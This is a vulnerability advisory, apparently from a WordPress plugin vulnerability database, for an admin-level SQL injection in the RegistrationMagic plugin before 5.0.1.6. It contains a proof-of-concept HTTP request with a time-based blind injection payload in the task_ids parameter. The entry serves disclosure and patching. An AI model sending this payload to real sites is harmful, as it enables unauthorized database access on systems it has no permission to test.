WordPress Plugin Vulnerabilities
RegistrationMagic < 5.0.1.6 - Admin+ SQL Injection
Description
The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue
Proof of Concept
When there is at least one task (to created one, go to /wp-admin/admin.php?page=rm_ex_chronos_manage_tasks) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 99 Connection: close Cookie: [admin+] action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids[]=1+and+sleep(10))--+-
Affects Plugins
Fixed in version 5.0.1.6
References
Classification
Miscellaneous
Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
Verified
Yes
Timeline
Publicly Published
2021-12-08 (about 9 months ago)
Added
2021-12-08 (about 9 months ago)
Last Updated
2022-09-26 (about 5 days ago)